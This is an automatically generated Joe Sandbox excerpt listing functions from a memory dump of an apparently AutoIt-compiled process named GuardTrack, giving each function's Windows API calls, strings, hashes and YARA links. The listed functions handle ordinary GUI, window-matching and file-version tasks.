Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: ab92f6e5d9242bee5e6fb183ca4d5c3cffb6bd06383a4738a7c10ab17eb5bfcc
Instruction ID: 1f4543d70ab22ec7e3e6aaec7cc70f06658b89b8b8a5261f5dbf225b636ccc07
Opcode Fuzzy Hash: ab92f6e5d9242bee5e6fb183ca4d5c3cffb6bd06383a4738a7c10ab17eb5bfcc
Instruction Fuzzy Hash: E0616B75900228BFEB159FA4DC48AEE7B7AEF09320F109119FA15AB2A1D7719940DF90

Function 00638FFA Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 006390EA
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 006390FB
CharNextW.USER32(0000014E), ref: 0063912A
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0063916B
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00639181
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00639192
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 006391AF
SetWindowTextW.USER32(?,0000014E), ref: 006391FB
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00639211
SendMessageW.USER32(?,00001002,00000000,?), ref: 00639242
_memset.LIBCMT ref: 00639267
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 006392B0
_memset.LIBCMT ref: 0063930F
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00639339
SendMessageW.USER32(?,00001074,?,00000001), ref: 00639391
SendMessageW.USER32(?,0000133D,?,?), ref: 0063943E
InvalidateRect.USER32(?,00000000,00000001), ref: 00639460
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 006394AA
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 006394D7
DrawMenuBar.USER32(?), ref: 006394E6
SetWindowTextW.USER32(?,0000014E), ref: 0063950E

Strings

0, xrefs: 00639478

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 209584da18a860e431e1c4610d632741e8e9cfb11cc012b953717679bd7b8d69
Instruction ID: 3b2d480dfa19471a506f67acde8b3a7ad993ec92ca4758c95491957b0806a3b9
Opcode Fuzzy Hash: 209584da18a860e431e1c4610d632741e8e9cfb11cc012b953717679bd7b8d69
Instruction Fuzzy Hash: 4FE1B775900219AFDF209F54CC84EEF7BBAFF05750F10815AFA19A6291D7B08A81CFA1

Function 00634ECC Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00635007
GetDesktopWindow.USER32 ref: 0063501C
GetWindowRect.USER32(00000000), ref: 00635023
GetWindowLongW.USER32(?,000000F0), ref: 00635085
DestroyWindow.USER32(?), ref: 006350B1
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 006350DA
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 006350F8
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 0063511E
SendMessageW.USER32(?,00000421,?,?), ref: 00635133
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00635146
IsWindowVisible.USER32(?), ref: 00635166
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00635181
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00635195
GetWindowRect.USER32(?,?), ref: 006351AD
MonitorFromPoint.USER32(?,?,00000002), ref: 006351D3
GetMonitorInfoW.USER32(00000000,?), ref: 006351ED
CopyRect.USER32(?,?), ref: 00635204
SendMessageW.USER32(?,00000412,00000000), ref: 0063526F

Strings

tooltips_class32, xrefs: 006350D3
(, xrefs: 006351E0
0, xrefs: 00634FB2

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: f1dd915e488f85b85dd5aea8f5319fcd0fce3d0244e1d7d41f324f03d4a04987
Instruction ID: 20f21a3a1739b2f56cd7f17dd37189f1a6f1f01b98fa2eb153e1e8b1d8a3fe16
Opcode Fuzzy Hash: f1dd915e488f85b85dd5aea8f5319fcd0fce3d0244e1d7d41f324f03d4a04987
Instruction Fuzzy Hash: D9B18C71604751AFD704DF64C848BABBBE6FF89310F00891CF99A9B291DB71E905CB92

Function 0061498A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 0061499C
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 006149C2
_wcscpy.LIBCMT ref: 006149F0
_wcscmp.LIBCMT ref: 006149FB
_wcscat.LIBCMT ref: 00614A11
_wcsstr.LIBCMT ref: 00614A1C
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00614A38
_wcscat.LIBCMT ref: 00614A81
_wcscat.LIBCMT ref: 00614A88
_wcsncpy.LIBCMT ref: 00614AB3

Strings

04090000, xrefs: 00614A6E
StringFileInfo\, xrefs: 00614A0B
\VarFileInfo\Translation, xrefs: 00614A30
%u.%u.%u.%u, xrefs: 00614B16
DefaultLangCodepage, xrefs: 00614A9B

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: f9d5588b9fcb37b46ebfa42280f79ffe47df40ee7f09d6367ee0f11c9b8eb9e9
Instruction ID: c3c36656a7455d28cc232d6171595a246b13e0b399012a49794338fa2c7ae965
Opcode Fuzzy Hash: f9d5588b9fcb37b46ebfa42280f79ffe47df40ee7f09d6367ee0f11c9b8eb9e9
Instruction Fuzzy Hash: 55411972604206BBE720B7788C4BEFF7B6DEF81710F14045BF904E7292EB359A4196A5

Function 005B2BA9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 005B2C8C
GetSystemMetrics.USER32(00000007), ref: 005B2C94
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 005B2CBF
GetSystemMetrics.USER32(00000008), ref: 005B2CC7
GetSystemMetrics.USER32(00000004), ref: 005B2CEC
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 005B2D09
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 005B2D19
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 005B2D4C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 005B2D60
GetClientRect.USER32(00000000,000000FF), ref: 005B2D7E
GetStockObject.GDI32(00000011), ref: 005B2D9A
SendMessageW.USER32(00000000,00000030,00000000), ref: 005B2DA5

Part of subcall function 005B2714: GetCursorPos.USER32(?), ref: 005B2727
Part of subcall function 005B2714: ScreenToClient.USER32(006777B0,?), ref: 005B2744
Part of subcall function 005B2714: GetAsyncKeyState.USER32(00000001), ref: 005B2769
Part of subcall function 005B2714: GetAsyncKeyState.USER32(00000002), ref: 005B2777

SetTimer.USER32(00000000,00000000,00000028,005B13C7), ref: 005B2DCC

Strings

AutoIt v3 GUI, xrefs: 005B2D44
hd, xrefs: 005B2BEC, 005EC433

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI$hd
API String ID: 1458621304-344532198
Opcode ID: 686fa291ceaac6769d170e7ef7a8e71f4b3ade8d9e8a95005139f2d12c89f8a5
Instruction ID: 32c76169963c2c879f1435a282d3650ddfdf5785be061c4ce244e872c3b08870
Opcode Fuzzy Hash: 686fa291ceaac6769d170e7ef7a8e71f4b3ade8d9e8a95005139f2d12c89f8a5
Instruction Fuzzy Hash: BBB17B75A0020AAFDB18DFA8CC49BEE7FA5FB48311F104529FA15A7290DB70E851CB61

Function 005D0429 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 349COMMON

Download Yara Rule

APIs

Part of subcall function 005C1821: _memmove.LIBCMT ref: 005C185B

GetForegroundWindow.USER32(00640980,?,?,?,?,?), ref: 005D04E3
IsWindow.USER32(?), ref: 006066BB

Strings

HANDLE, xrefs: 0060649E
TITLE, xrefs: 00606650
ACTIVE, xrefs: 00606488
LAST, xrefs: 00606472
REGEXPCLASS, xrefs: 00606506
CLASS, xrefs: 006064E5
INSTANCE, xrefs: 006065FA
ALL, xrefs: 00606622
REGEXPTITLE, xrefs: 006064B4

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Window$Foreground_memmove
String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
API String ID: 3828923867-1919597938
Opcode ID: 47105c7d8e52ecff44917396be7170d7769945a9dbf6f71b0564af2f4e5a566d
Instruction ID: 9fe94ee1dc2241034c2342ad6070542aedbfd65a24adfdf8321d621d129b0798
Opcode Fuzzy Hash: 47105c7d8e52ecff44917396be7170d7769945a9dbf6f71b0564af2f4e5a566d
Instruction Fuzzy Hash: 3AD1A130144603DFCB18EF64C445A9ABFA6BF95348F104A1EF456932E2DB31E969CB92

Function 0063441F Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 006344AC
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 0063456C

Strings

SELECTCLEAR, xrefs: 006345EB
GETSELECTED, xrefs: 0063469A
DESELECT, xrefs: 0063465A
ISSELECTED, xrefs: 00634577
SELECTALL, xrefs: 006345D3
GETITEMCOUNT, xrefs: 006344DE
VIEWCHANGE, xrefs: 0063472B
GETTEXT, xrefs: 00634515
GETSUBITEMCOUNT, xrefs: 006344F7
SELECT, xrefs: 00634606
FINDITEM, xrefs: 006346DF
GETSELECTEDCOUNT, xrefs: 0063454F
SELECTINVERT, xrefs: 0063463C

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: 65a8cf6141c36d8421d02cac678599bb88e2ab0df7ec07423de527e11b16d4d4
Instruction ID: 201b78cbb61e3e56a156e05dbab628d35599f4b76ba2b9f26c723c3092a0a607
Opcode Fuzzy Hash: 65a8cf6141c36d8421d02cac678599bb88e2ab0df7ec07423de527e11b16d4d4
Instruction Fuzzy Hash: 20A12C302146429FCB14EF64C855AAABBA6BF85314F10496DF8969B3D2DF31FC05CB91

Function 006256C8 Relevance: 27.1, APIs: 18, Instructions: 124COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 006256E1
LoadCursorW.USER32(00000000,00007F8A), ref: 006256EC
LoadCursorW.USER32(00000000,00007F00), ref: 006256F7
LoadCursorW.USER32(00000000,00007F03), ref: 00625702
LoadCursorW.USER32(00000000,00007F8B), ref: 0062570D
LoadCursorW.USER32(00000000,00007F01), ref: 00625718
LoadCursorW.USER32(00000000,00007F81), ref: 00625723
LoadCursorW.USER32(00000000,00007F88), ref: 0062572E
LoadCursorW.USER32(00000000,00007F80), ref: 00625739
LoadCursorW.USER32(00000000,00007F86), ref: 00625744
LoadCursorW.USER32(00000000,00007F83), ref: 0062574F
LoadCursorW.USER32(00000000,00007F85), ref: 0062575A
LoadCursorW.USER32(00000000,00007F82), ref: 00625765
LoadCursorW.USER32(00000000,00007F84), ref: 00625770
LoadCursorW.USER32(00000000,00007F04), ref: 0062577B
LoadCursorW.USER32(00000000,00007F02), ref: 00625786
GetCursorInfo.USER32(?), ref: 00625796
GetLastError.KERNEL32(00000001,00000000), ref: 006257C1

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: 7a805098f57ff5f72c4a23cf8a7571c0164658e0fdd3a98aa5844e927388b4a9
Instruction ID: 7f1a31984ef2c9adda92f8b3071e48e141dd1cd8732c20551012f7755e388dbb
Opcode Fuzzy Hash: 7a805098f57ff5f72c4a23cf8a7571c0164658e0fdd3a98aa5844e927388b4a9
Instruction Fuzzy Hash: 21418870E443296ADB209FB69C49DAFFFF9EF41B10B10452FE509E7291DAB86401CE51

Function 0060B13A Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0060B17B
__swprintf.LIBCMT ref: 0060B21C
_wcscmp.LIBCMT ref: 0060B22F
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0060B284
_wcscmp.LIBCMT ref: 0060B2C0
GetClassNameW.USER32(?,?,00000400), ref: 0060B2F7
GetDlgCtrlID.USER32(?), ref: 0060B349
GetWindowRect.USER32(?,?), ref: 0060B37F
GetParent.USER32(?), ref: 0060B39D
ScreenToClient.USER32(00000000), ref: 0060B3A4
GetClassNameW.USER32(?,?,00000100), ref: 0060B41E
_wcscmp.LIBCMT ref: 0060B432
GetWindowTextW.USER32(?,?,00000400), ref: 0060B458
_wcscmp.LIBCMT ref: 0060B46C

Part of subcall function 005D385C: _iswctype.LIBCMT ref: 005D3864

Strings

%s%u, xrefs: 0060B216

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: 946187b10e5244c0d71e90a9f5a6c2d6412f3d01eb684365b4df42b7bc133bf2
Instruction ID: d6286c7f31978c0cf0076e151c216d727e71079c615dd043111750dc5a209d5e
Opcode Fuzzy Hash: 946187b10e5244c0d71e90a9f5a6c2d6412f3d01eb684365b4df42b7bc133bf2
Instruction Fuzzy Hash: E4A1FF71244206AFD718DF64C884FEBBBEAFF44314F10952AF999C2291DB30EA55CB91

Function 0060BA6D Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 0060BAB1
_wcscmp.LIBCMT ref: 0060BAC2
GetWindowTextW.USER32(00000001,?,00000400), ref: 0060BAEA
CharUpperBuffW.USER32(?,00000000), ref: 0060BB07
_wcscmp.LIBCMT ref: 0060BB25
_wcsstr.LIBCMT ref: 0060BB36
GetClassNameW.USER32(00000018,?,00000400), ref: 0060BB6E
_wcscmp.LIBCMT ref: 0060BB7E
GetWindowTextW.USER32(00000002,?,00000400), ref: 0060BBA5
GetClassNameW.USER32(00000018,?,00000400), ref: 0060BBEE
_wcscmp.LIBCMT ref: 0060BBFE
GetClassNameW.USER32(00000010,?,00000400), ref: 0060BC26
GetWindowRect.USER32(00000004,?), ref: 0060BC8F

Strings

@, xrefs: 0060BA92
ThumbnailClass, xrefs: 0060BB79, 0060BBF9

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 57effe83af8ea3fe8e01d680beed484f5bab4591b87d08e8c2420ce0ab57672f
Instruction ID: a2e8a84a70cf629482591986f2a6f13e3de78ec374490842f2c8801be29de00f
Opcode Fuzzy Hash: 57effe83af8ea3fe8e01d680beed484f5bab4591b87d08e8c2420ce0ab57672f
Instruction Fuzzy Hash: 7881C071044206ABEB18CF14C885FAB7BDAFF84314F04A46AFD898A1D6DB30DD45CB61

Function 0060B8B6 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0060B915

Strings

[ACTIVE, xrefs: 0060B902
[REGEXPTITLE:, xrefs: 0060B93D
REGEXP=, xrefs: 0060B92A
[CLASS:, xrefs: 0060B965
HANDLE=, xrefs: 0060B90E
[HANDLE:, xrefs: 0060B921
CLASSNAME=, xrefs: 0060B952
ACTIVE, xrefs: 0060B8F0
LAST, xrefs: 0060B8DA
ALL, xrefs: 0060B9A9
[LAST, xrefs: 0060B9C2
[ALL, xrefs: 0060B9BB

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: f4564a89c4ef65e438c688002e9b9e1fe4a713703cd54b5618ce4fe83ebda29d
Instruction ID: 8a305efca7acf3c2109e9886a8e01d4ec0303f996277610440de23da0f0febed
Opcode Fuzzy Hash: f4564a89c4ef65e438c688002e9b9e1fe4a713703cd54b5618ce4fe83ebda29d
Instruction Fuzzy Hash: 6831D834584207AACB18EBE0CD47FEE7BA6BF52350F200129F551B11D2EF956E04CA56

Function 0060CB97 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 0060CBAA
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0060CBBC
SetWindowTextW.USER32(?,?), ref: 0060CBD3
GetDlgItem.USER32(?,000003EA), ref: 0060CBE8
SetWindowTextW.USER32(00000000,?), ref: 0060CBEE
GetDlgItem.USER32(?,000003E9), ref: 0060CBFE
SetWindowTextW.USER32(00000000,?), ref: 0060CC04
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0060CC25
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0060CC3F
GetWindowRect.USER32(?,?), ref: 0060CC48
SetWindowTextW.USER32(?,?), ref: 0060CCB3
GetDesktopWindow.USER32 ref: 0060CCB9
GetWindowRect.USER32(00000000), ref: 0060CCC0
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0060CD0C
GetClientRect.USER32(?,?), ref: 0060CD19
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0060CD3E
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0060CD69

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 7e266e2451f32bbc436e84230f682a17067f9903df130d6275591f463cd3d7d6
Instruction ID: 063fb74cc7d7392ab4787444c550f97dc882be2c9e933160657c6097f7ffff51
Opcode Fuzzy Hash: 7e266e2451f32bbc436e84230f682a17067f9903df130d6275591f463cd3d7d6
Instruction Fuzzy Hash: 46516030940709EFEB249FA8CD89BAFBBB6FF04715F000618E646A26A0D774A914CB50

Function 0063A7DE Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0063A87E
DestroyWindow.USER32(00000000,?), ref: 0063A8F8

Part of subcall function 005C1821: _memmove.LIBCMT ref: 005C185B

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0063A972
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0063A994
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0063A9A7
DestroyWindow.USER32(00000000), ref: 0063A9C9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,005B0000,00000000), ref: 0063AA00
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0063AA19
GetDesktopWindow.USER32 ref: 0063AA32
GetWindowRect.USER32(00000000), ref: 0063AA39
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0063AA51
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0063AA69

Part of subcall function 005B29AB: GetWindowLongW.USER32(?,000000EB), ref: 005B29BC

Strings

tooltips_class32, xrefs: 0063A96B, 0063A9F9
0, xrefs: 0063A894

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

